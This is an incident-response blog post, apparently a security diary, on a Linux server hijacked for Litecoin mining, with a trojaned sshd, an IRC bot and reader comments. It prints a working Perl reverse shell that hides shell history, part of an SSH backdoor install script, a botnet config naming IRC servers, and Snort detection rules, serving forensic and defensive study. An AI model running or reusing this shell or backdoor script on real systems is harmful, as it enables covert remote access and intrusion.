The case of Minerd

Published: 2013-12-16. Last Updated: 2013-12-16 03:40:49 UTC
by Tom Webb (Version: 2)
6 comment(s)

 

I recently ran across an interesting compromised system. While the initial compromise vector was nothing special (compromised credentials), what the system was being used for and one of the attacker's persistence techniques were a lot less common than I normally see. The system had three different backdoors and was used for mining virtual currency.

 

When responding to the system, I quickly noticed that an unknown process was running. Additionally, I saw that the running process's binary had been deleted, and an additional file belonging to the process had also been deleted (see below). This is a common technique for attackers on Linux systems: while the file is marked deleted on the file system, the process keeps it open until it is stopped.

 

Minerd

--------------

PS Results

1 S www-data 13335     1 99  80   0 - 13941 -      Nov10 ?        12-01:46:12 ./minerd -o stratum+tcp://mine.pool-x.eu:9000 -u <user> -p <pw>--algo scrypt --no-longpoll -B

 

LSOF Results

minerd    13335   www-data  txt       REG        8,1   379680     385036 /tmp/minerd (deleted)

minerd    13335   www-data    4u     IPv4   14473113                 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED)

--------------
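The deleted-but-still-running trick above is easy to check for on a live host, because the kernel appends " (deleted)" both to the NAME column that lsof prints for the txt (executable image) descriptor and to the /proc/<pid>/exe symlink. The following Python is an added example, not part of the diary or of any tool used in the incident: it parses lsof output shaped like the listing above (the embedded sample is constructed from that listing), performs the same check directly against /proc, and copies the image out of /proc while the process is still alive, which is the last point at which it can be recovered without carving the disk. Function names and the sample data are mine.

```python
import os
import shutil
from typing import Dict, List

# Constructed sample modelled on the lsof output in the diary; not a live capture.
# "txt" is the process's executable image; the kernel appends " (deleted)" to NAME
# once that file has been unlinked.
SAMPLE_LSOF = """\
COMMAND     PID     USER   FD      TYPE     DEVICE SIZE/OFF       NODE NAME
minerd    13335   www-data  txt       REG        8,1   379680     385036 /tmp/minerd (deleted)
minerd    13335   www-data    4u     IPv4   14473113                 TCP d.local:41591->mine.pool-x.eu:9000 (ESTABLISHED)
sshd       1234       root  txt       REG        8,1   787928     131072 /usr/sbin/sshd
"""

DELETED_SUFFIX = " (deleted)"


def deleted_executables_from_lsof(text: str) -> List[Dict[str, str]]:
    """Parse `lsof` output and return executable images that were unlinked
    while the process kept running."""
    findings = []
    for line in text.splitlines()[1:]:          # skip the column header
        fields = line.split(None, 8)            # NAME may contain spaces: cap the split at 9 fields
        if len(fields) < 9:
            continue
        command, pid, user, fd, name = fields[0], fields[1], fields[2], fields[3], fields[8]
        if fd == "txt" and name.endswith(DELETED_SUFFIX):
            findings.append({"command": command, "pid": pid, "user": user,
                             "path": name[: -len(DELETED_SUFFIX)]})
    return findings


def deleted_executables_from_proc(proc_root: str = "/proc") -> List[Dict[str, str]]:
    """Live check without lsof: /proc/<pid>/exe is a symlink to the image and
    carries the same " (deleted)" marker once the file is gone."""
    findings = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue                            # kernel thread, already exited, or no permission
        if target.endswith(DELETED_SUFFIX):
            findings.append({"pid": entry, "path": target[: -len(DELETED_SUFFIX)]})
    return findings


def recover_image(pid: str, dest: str) -> str:
    """Copy the still-open executable out of /proc for analysis. Once the process
    exits the inode is released and only a disk carve could get the binary back."""
    shutil.copyfile(f"/proc/{pid}/exe", dest)
    return dest


if __name__ == "__main__":
    for hit in deleted_executables_from_lsof(SAMPLE_LSOF):
        print(f"sample: pid {hit['pid']} ({hit['user']}) runs deleted image {hit['path']}")
    if os.path.isdir("/proc"):
        for hit in deleted_executables_from_proc():
            print(f"live:   pid {hit['pid']} runs deleted image {hit['path']}")
```

Run it as root on the suspect host; `recover_image("13335", "/root/case/minerd.bin")` is the call that would have preserved the miner in the case above before anyone killed the process.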

 

Minerd is used for Litecoin mining; think of Litecoin as a cheaper version of Bitcoin, one designed for CPU mining of coins. As virtual currency values continue to increase, I expect to see a lot more of these types of attacks on servers. Mining will pay better than using the system for spamming or as a basic bot.

 

This software speaks the Stratum mining protocol. Below is a sample of the traffic to the mining pool (178.33.111.19).

--------------

{"params": ["ee9", "f2d2b32c8c45a965c0459d7ce169b9cbb71d741d2a77574577f6658dfa677e0a", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2103830207062f503253482f0410bf835208", "072f506f6f6c582f0000000001e08e472a010000001976a9146effd3bfcee317f978ea0927efd99f5d7992dacd88ac00000000", ["28eab10f99561dbabf1555ea7f36358e4752a7dc1a69ad980e50156e89e00320", "963c9c57be6a0b60f421861cbfc8ca6aa75e5ca0ad43b9276a46a871223d381a", "ad83aa11bab14d23472518b9c0d5bc59ab869b45f022a8e176a50c58af70abb4"], "00000002", "1b340532", "5283bf10", false], "id": null, "method": "mining.notify"}

--------------

 

I was able to find a write-up on the protocol at mining(dot)bitcoin(dot)cz/stratum-mining.

 

I did not find a Snort rule for this kind of traffic. The rule below matches on any port, as I was not able to verify that the port should always be 9000; it seems to depend on the mining pool the attacker is using.

 

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Possible Bitcoin/LiteCoin Mining"; flow:established; content:"|7B 22 70 61 72 61 6D 73 22 3A 20 5B 22|"; depth:15; classtype:bad-unknown; reference:url,mining.bitcoin.cz/stratum-mining; sid:1000500; rev:1;)
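To see exactly what the rule above keys on, here is an added Python example (not from the diary, and not a Snort component) that applies the same 13-byte content check with the same 15-byte depth to raw payloads, and then decodes the Stratum JSON-RPC messages themselves: the client's mining.subscribe and mining.authorize, the server's subscribe result, and mining.notify jobs, whose ntime field is a hex Unix timestamp that tells you when the pool issued the work. The session lines are constructed following the field layout in the Stratum write-up the diary links to; the hex values, worker name, decoy lines and function names are mine.

```python
import json
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional

# The byte pattern from the Snort rule, {"params": ["  , and its depth:15 limit.
NOTIFY_PREFIX = bytes.fromhex("7B 22 70 61 72 61 6D 73 22 3A 20 5B 22")
SNORT_DEPTH = 15

# Constructed Stratum session (newline-delimited JSON-RPC). Hex values and the worker
# name are made up; coinb1/coinb2 are truncated to keep the sample short.
SAMPLE_SESSION = [
    b'{"id": 1, "method": "mining.subscribe", "params": []}\n',                      # client
    b'{"id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f8002c90", 4], "error": null}\n',
    b'{"id": 2, "method": "mining.authorize", "params": ["worker.1", "x"]}\n',       # client
    b'{"params": ["ee9", "' + b"f2" * 32 + b'", "0100000001", "ffffffff00", ["' + b"28" * 32
    + b'"], "00000002", "1b340532", "5283bf10", false], "id": null, "method": "mining.notify"}\n',
    b'{"id": 7, "method": "getinfo", "params": []}\n',                               # JSON-RPC, not Stratum
    b"GET / HTTP/1.1\r\n",                                                           # not JSON at all
]


def snort_content_matches(payload: bytes) -> bool:
    """Same test as the Snort rule: the content must lie within the first 15 bytes."""
    return payload.find(NOTIFY_PREFIX, 0, SNORT_DEPTH) != -1


def parse_notify(params: List[Any]) -> Dict[str, Any]:
    """mining.notify params: job_id, prevhash, coinb1, coinb2, merkle_branch,
    version, nbits, ntime, clean_jobs."""
    job_id, _prevhash, _coinb1, _coinb2, merkle_branch, _version, nbits, ntime, clean_jobs = params
    return {
        "job_id": job_id,
        "merkle_branches": len(merkle_branch),
        "nbits": nbits,
        # ntime is the block time as hex seconds since the Unix epoch
        "ntime": datetime.fromtimestamp(int(ntime, 16), tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "clean_jobs": bool(clean_jobs),
    }


def classify_stratum(payload: bytes) -> Optional[Dict[str, Any]]:
    """Summarise the Stratum message in one line of traffic, or return None if it is not Stratum."""
    try:
        msg = json.loads(payload)
    except ValueError:                      # covers JSONDecodeError and bad UTF-8
        return None
    if not isinstance(msg, dict):
        return None
    method = msg.get("method")
    params = msg.get("params") or []
    if isinstance(method, str) and method.startswith("mining."):
        info: Dict[str, Any] = {
            "method": method,
            "direction": "server" if method in ("mining.notify", "mining.set_difficulty") else "client",
        }
        if method == "mining.authorize" and params:
            info["worker"] = params[0]      # the pool account the stolen CPU time is credited to
        if method == "mining.notify" and len(params) == 9:
            info.update(parse_notify(params))
        return info
    # Server reply to mining.subscribe: result = [subscriptions, extranonce1, extranonce2_size]
    result = msg.get("result")
    if isinstance(result, list) and len(result) == 3 and "mining.notify" in json.dumps(result[0]):
        return {"method": "mining.subscribe-result", "direction": "server", "extranonce1": result[1]}
    return None


def summarize_session(lines: List[bytes]) -> List[str]:
    """Method names of the Stratum messages found, in order; non-Stratum lines are dropped."""
    return [c["method"] for c in (classify_stratum(line) for line in lines) if c]


if __name__ == "__main__":
    for line in SAMPLE_SESSION:
        print(snort_content_matches(line), classify_stratum(line))
```

Note that the rule only fires on the server's mining.notify (pool to victim), which is why its direction is $EXTERNAL_NET to $HOME_NET; the client's subscribe and authorize messages travel the other way and would need a separate rule, as the Emerging Threats rules in the comments below illustrate.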


 

SSHD Trojaned

The attacker had time-stomped all the files in the /usr/sbin directory to hide the file modifications. Some interesting strings in the SSH daemon let us quickly find the backdoor (see below). Trojaned files have been around for a long time, but I do not often run into them on compromised Linux servers. In this case, the attacker was not very stealthy about the modifications to the file.

--------------

Partial Strings from the back door

[1m |Enjoy this private backdoor!  |
[2;31m
[1m  <----|====O)))==)\) /====
[36m
[1m |We won't do any harm to you;) |
220f5212624556ad12718ecb1c5cdda2

--------------
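Time-stomping defeats a naive review of modification times, but it does not change file content, so comparing installed binaries against the package manager's manifests still finds a trojaned daemon. The following Python is an added example, not from the diary or from the toolkit it describes: it parses dpkg's per-package .md5sums manifest format ("<md5>  <path without leading slash>"), verifies the files under a root against it, and adds the mtime/ctime heuristic that catches back-dating (utime can rewind mtime, but ctime is only set by the kernel). demo() builds a throwaway tree with a constructed manifest so the check can be exercised offline; all names and sample content are mine.

```python
import hashlib
import os
import shutil
import tempfile
from typing import Dict, List, Tuple


def parse_md5sums(text: str) -> Dict[str, str]:
    """Parse dpkg's /var/lib/dpkg/info/<pkg>.md5sums format into {absolute path: md5}."""
    expected = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            expected["/" + parts[1].strip()] = parts[0].lower()
    return expected


def md5_of(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_against_manifest(expected: Dict[str, str], root: str = "/") -> List[Tuple[str, str, str]]:
    """Return (path, expected_md5, actual_md5_or_'missing') for every file that no longer matches."""
    mismatches = []
    for path, digest in expected.items():
        full = os.path.join(root, path.lstrip("/"))
        if not os.path.isfile(full):
            mismatches.append((path, digest, "missing"))
            continue
        actual = md5_of(full)
        if actual != digest:
            mismatches.append((path, digest, actual))
    return mismatches


def ctime_after_mtime(path: str, skew_seconds: int = 86400) -> bool:
    """Time-stomping heuristic: the file's inode change time is well after its claimed
    modification time. Package installs show the same pattern, so treat hits as leads."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > skew_seconds


def demo() -> List[Tuple[str, str, str]]:
    """Build a throwaway tree with one intact and one replaced binary plus a missing one,
    verify it against a constructed manifest, and return the mismatches."""
    root = tempfile.mkdtemp()
    sbin = os.path.join(root, "usr", "sbin")
    os.makedirs(sbin)
    intact = b"#!/bin/sh\necho intact\n"
    original_sshd = b"#!/bin/sh\necho original sshd\n"   # what the package shipped (constructed)
    modified_sshd = b"#!/bin/sh\necho modified\n"        # stands in for the trojaned daemon
    with open(os.path.join(sbin, "intact"), "wb") as f:
        f.write(intact)
    with open(os.path.join(sbin, "sshd"), "wb") as f:
        f.write(modified_sshd)
    manifest = (
        hashlib.md5(intact).hexdigest() + "  usr/sbin/intact\n"
        + hashlib.md5(original_sshd).hexdigest() + "  usr/sbin/sshd\n"
        + "0" * 32 + "  usr/sbin/removed\n"
    )
    try:
        return verify_against_manifest(parse_md5sums(manifest), root=root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path, expected, actual in demo():
        print(f"{path}: expected {expected}, got {actual}")
```

On a real host, `dpkg --verify` (or debsums) and `rpm -Va` do this natively, and only files owned by packages are covered. An attacker with root could also have edited the manifest on the box, so the trustworthy comparison is against hashes taken from the distribution's own copy of the package, not from the compromised system's /var/lib/dpkg.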

 

The initial script for building the backdoor was not recovered from the servers. After some quick Googling, I came across this install script for an SSH backdoor (pastebin.com/CDe7epGA). Other parts of the toolkit seemed to match up. This may not be the identical script, but it was close to what was used.

 

--------------

BPASS=`./tools/random.sh 12`
echo -e "${BLUE}# Backdoor Password set to : ${WHITE}${BPASS}${NORMAL}"
cat backdoor.h|sed -e s/SSHD_PASS/"$BPASS"/ -e s#LOG_PATH#"$LPATH"# > 1.temp
mv 1.temp backdoor.h
./configure --sysconfdir=/etc/ssh 2> error_log.1

./logcleaner -u root
echo -e "${CYAN}# ENJOY THIS PRIVATE BACKDOOR ${NORMAL}"

--------------


 

IRC BOT

The second backdoor was a typical IRC bot. Nothing special here; the install directory was /var/lib/.phpdata/sshd. The attacker named the script sshd to try to make it blend in on the system. The IRC channel name was #MuieBa.

 

 

 

Perl Backdoor

 

This is a typical Perl reverse shell: you give the script the IP and port you want to “shovel a shell” to. It was located in the /tmp folder and was never used by the attacker. The script stops the bash_history file from being saved and echoes system information when it connects to the destination. Its MD5 is 48d4d5a3dee9ef43e5b1387356d2f7ff and its filename is back.txt.

 

--------------

cat back.txt

#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== ==-- \n\n";
if ($ARGC!=2) {
  print "Usage: $0 [Host] [Port] \n\n";
  die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);

--------------



Are you seeing compromised servers being used for mining currency? Let us know!

 

Tom Webb


Comments

I've been seeing this rise in the past few months, mostly these are exploiting the re-emergence of CVE-2012-1823, mostly they use this to spawn the usual perl IRC bots, but I've also seen ColdFusion vulnerabilities leveraged on windows boxes to get bitcoin miners on there too.
I've mainly had them sign up for VPS services. I wondered why but I figured out by looking at the Litecoin hardware page - E5-2620 CPUs do the best which may explain Thai, Vietnamese and Filipinos signing up for 10 - 40 services at a time.
I did these three at the weekend which I have submitted to emergingthreats. They will go through QA and will hopefully be ok for going into the ET rule update.

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET TROJAN W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message"; flow:established,to_server; content:"{|22|id|22|"; depth:10; content:"|22|method|22 3A| |22|mining."; within:100; content:"|22|params|22|"; within:50; pcre:"/\x22mining\x2E(subscribe|authorize)\x22/"; classtype:trojan-activity; reference:url,research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.html; reference:url,www.btcguild.com/new_protocol.php; reference:url,mining.bitcoin.cz/stratum-mining; sid:123997; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Initial Connection Server Response"; flow:established,to_client; content:"|22|result|22 3A| [[|22|mining.notify|22|"; depth:120; classtype:trojan-activity; reference:url,research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.html; reference:url,www.btcguild.com/new_protocol.php; reference:url,mining.bitcoin.cz/stratum-mining; sid:124009; rev:1;)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN W32/BitCoinMiner.MultiThreat Stratum Protocol Mining.Notify Work Server Response"; flow:established,to_client; content:"|22|params|22 3A| [|22|"; depth:120; content:"|22|method|22 3A| |22|mining.notify|22|"; distance:0; classtype:trojan-activity; reference:url,research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.html; reference:url,www.btcguild.com/new_protocol.php; reference:url,mining.bitcoin.cz/stratum-mining; sid:124010; rev:1;)

Is this article from the past? I saw minerd nearly a year ago!

I found this ...

b0tnet

NICK root
USERFILE 1
CMDCHAR -
LOGIN root
IRCNAME ^C2root^C
MODES +ix-ws
TOG CC 1
TOG CLOAK 1
TOG SPY 1
SET OPMODES 4
SET BANMODES 6
SET AAWAY 0
TOG NOIDLE 1

CHANNEL #fuckspot
TOG PUB 1
TOG MASS 1
TOG SHIT 1
TOG PROT 1
TOG ENFM 1
SET ENFM +nts
SET MDL 4
SET MKL 4
SET MBL 4
SET MPL 1

SERVER 93.174.94.158 6667
SERVER 210.205.6.30 6667
SERVER 209.20.66.191 6667
SERVER 208.98.59.236 6667
SERVER 89.248.172.144 6667
SERVER 208.98.59.236 6667
SERVER 186.2.165.72 6667
SERVER 115.47.22.196 6667

The current PHP worm stuff seems to be virtual currency related.

http://sempersecurus.blogspot.co.uk/2013/12/a-forensic-overview-of-linux-perlbot.html
